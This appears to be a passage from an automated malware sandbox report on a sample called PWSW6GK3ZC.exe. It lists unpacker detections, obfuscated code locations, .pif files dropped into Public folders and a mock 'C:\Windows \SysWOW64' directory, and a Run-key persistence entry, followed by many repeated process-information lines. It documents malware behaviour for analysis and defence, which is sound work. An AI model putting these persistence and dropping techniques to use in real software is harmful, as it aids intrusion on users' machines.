Source: Yara match	File source: 00000000.00000002.2119376344.000000000237F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains potential unpacker

Source: 7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 7.2.fpnevlzQ.pif.30630000.4.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 10.2.fpnevlzQ.pif.1f830000.5.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: svchost.pif.0.dr

Static PE information: 0xA57E43AD [Tue Dec 25 14:18:21 2057 UTC]

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028B3E98 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_028B3E98

Source: svchost.pif.0.dr	Static PE information: section name: .imrsiv
Source: svchost.pif.0.dr	Static PE information: section name: .didat
Source: NETUTILS.dll.0.dr	Static PE information: section name: .xdata
Source: NETUTILS.dll.0.dr	Static PE information: section name: /4
Source: NETUTILS.dll.0.dr	Static PE information: section name: /19
Source: NETUTILS.dll.0.dr	Static PE information: section name: /31
Source: NETUTILS.dll.0.dr	Static PE information: section name: /45
Source: NETUTILS.dll.0.dr	Static PE information: section name: /57
Source: NETUTILS.dll.0.dr	Static PE information: section name: /70
Source: NETUTILS.dll.0.dr	Static PE information: section name: /81
Source: NETUTILS.dll.0.dr	Static PE information: section name: /92
Source: ndpha.pif.6.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028C62A4 push 028C630Fh; ret	0_2_028C6307
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028A3240 push eax; ret	0_2_028A327C
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028C60AC push 028C6125h; ret	0_2_028C611D
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B400E push 028B4048h; ret	0_2_028B4040
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B6018 push 028B6050h; ret	0_2_028B6048
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B4010 push 028B4048h; ret	0_2_028B4040
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B6017 push 028B6050h; ret	0_2_028B6048
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028A61BE push 028A6202h; ret	0_2_028A61FA
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028A61C0 push 028A6202h; ret	0_2_028A61FA
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028C61F8 push 028C6288h; ret	0_2_028C6280
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028C6144 push 028C61ECh; ret	0_2_028C61E4
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028AF678 push 028AF6C5h; ret	0_2_028AF6BD
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028AF677 push 028AF6C5h; ret	0_2_028AF6BD
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B2488 push ecx; mov dword ptr [esp], edx	0_2_028B248A
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028AC4FF push 028AC696h; ret	0_2_028AC68E
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028AC510 push 028AC696h; ret	0_2_028AC68E
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028AF56C push 028AF5E2h; ret	0_2_028AF5DA
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028BA8B4 push ecx; mov dword ptr [esp], edx	0_2_028BA8B9
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028BA918 push ecx; mov dword ptr [esp], edx	0_2_028BA91D
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028ABE90 push ecx; mov dword ptr [esp], edx	0_2_028ABE95
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028ACE58 push 028ACE84h; ret	0_2_028ACE7C
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B2F52 push 028B2FFFh; ret	0_2_028B2FF7
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B2F54 push 028B2FFFh; ret	0_2_028B2FF7
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028B3DB8 push 028B3DFAh; ret	0_2_028B3DF2
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028A5DF2 push 028A5E4Fh; ret	0_2_028A5E47
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028A5DF4 push 028A5E4Fh; ret	0_2_028A5E47
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: 0_2_028C5D08 push 028C5EE4h; ret	0_2_028C5EDC
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_0041C40C push cs; iretd	7_2_0041C4E2
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_00423149 push eax; ret	7_2_00423179
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_0041C50E push cs; iretd	7_2_0041C4E2
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: 7_2_004231C8 push eax; ret	7_2_00423179

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Users\Public\Libraries\Qzlvenpf.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\ndpha.pif	Jump to dropped file
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Users\Public\Libraries\fpnevlzQ.pif	Jump to dropped file

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Users\Public\Libraries\Qzlvenpf.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\ndpha.pif	Jump to dropped file
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Users\Public\Libraries\fpnevlzQ.pif	Jump to dropped file

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\ndpha.pif

Jump to dropped file

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Windows \SysWOW64\svchost.pif			Jump to dropped file
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\ndpha.pif

Jump to dropped file

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Qzlvenpf			Jump to behavior
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Qzlvenpf			Jump to behavior

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028B6490 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_028B6490

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ndpha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Process information set: NOOPENFILEERRORBOX
